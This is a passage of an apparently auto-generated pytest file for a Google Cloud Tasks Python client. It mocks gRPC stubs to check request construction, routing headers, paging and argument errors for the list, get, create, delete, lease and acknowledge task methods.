cloudtasks.ListTasksResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_tasks_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
def test_list_tasks_pager(transport_name: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_tasks(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, task.Task) for i in results)
def test_list_tasks_pages(transport_name: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = list(client.list_tasks(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_tasks_async_pager():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_tasks), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
async_pager = await client.list_tasks(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, task.Task) for i in responses)
@pytest.mark.asyncio
async def test_list_tasks_async_pages():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_tasks), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_tasks(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [cloudtasks.GetTaskRequest, dict,])
def test_get_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_get_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
client.get_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
@pytest.mark.asyncio
async def test_get_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.GetTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_get_task_async_from_dict():
await test_get_task_async(request_type=dict)
def test_get_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
call.return_value = task.Task()
client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.CreateTaskRequest, dict,])
def test_create_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task(
name="name_value",
view=gct_task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.view == gct_task.Task.View.BASIC
def test_create_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
client.create_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
@pytest.mark.asyncio
async def test_create_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.CreateTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_task.Task(name="name_value", view=gct_task.Task.View.BASIC,)
)
response = await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.view == gct_task.Task.View.BASIC
@pytest.mark.asyncio
async def test_create_task_async_from_dict():
await test_create_task_async(request_type=dict)
def test_create_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
call.return_value = gct_task.Task()
client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].task
mock_val = gct_task.Task(name="name_value")
assert arg == mock_val
def test_create_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].task
mock_val = gct_task.Task(name="name_value")
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
@pytest.mark.parametrize("request_type", [cloudtasks.DeleteTaskRequest, dict,])
def test_delete_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
client.delete_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
@pytest.mark.asyncio
async def test_delete_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.DeleteTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_task_async_from_dict():
await test_delete_task_async(request_type=dict)
def test_delete_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
call.return_value = None
client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.LeaseTasksRequest, dict,])
def test_lease_tasks(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.LeaseTasksResponse()
response = client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.LeaseTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, cloudtasks.LeaseTasksResponse)
def test_lease_tasks_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
client.lease_tasks()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.LeaseTasksRequest()
@pytest.mark.asyncio
async def test_lease_tasks_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.LeaseTasksRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.LeaseTasksResponse()
)
response = await client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.LeaseTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, cloudtasks.LeaseTasksResponse)
@pytest.mark.asyncio
async def test_lease_tasks_async_from_dict():
await test_lease_tasks_async(request_type=dict)
def test_lease_tasks_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.LeaseTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
call.return_value = cloudtasks.LeaseTasksResponse()
client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_lease_tasks_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.LeaseTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.LeaseTasksResponse()
)
await client.lease_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_lease_tasks_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.LeaseTasksResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.lease_tasks(
parent="parent_value", lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
def test_lease_tasks_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.lease_tasks(
cloudtasks.LeaseTasksRequest(),
parent="parent_value",
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.asyncio
async def test_lease_tasks_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.lease_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.LeaseTasksResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.LeaseTasksResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.lease_tasks(
parent="parent_value", lease_duration=duration_pb2.Duration(seconds=751),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
assert DurationRule().to_proto(args[0].lease_duration) == duration_pb2.Duration(
seconds=751
)
@pytest.mark.asyncio
async def test_lease_tasks_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.lease_tasks(
cloudtasks.LeaseTasksRequest(),
parent="parent_value",
lease_duration=duration_pb2.Duration(seconds=751),
)
@pytest.mark.parametrize("request_type", [cloudtasks.AcknowledgeTaskRequest, dict,])
def test_acknowledge_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.AcknowledgeTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_acknowledge_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
client.acknowledge_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.AcknowledgeTaskRequest()
@pytest.mark.asyncio
async def test_acknowledge_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.AcknowledgeTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.AcknowledgeTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_acknowledge_task_async_from_dict():
await test_acknowledge_task_async(request_type=dict)
def test_acknowledge_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.AcknowledgeTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
call.return_value = None
client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_acknowledge_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.AcknowledgeTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.acknowledge_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_acknowledge_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.acknowledge_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.acknowledge_task(
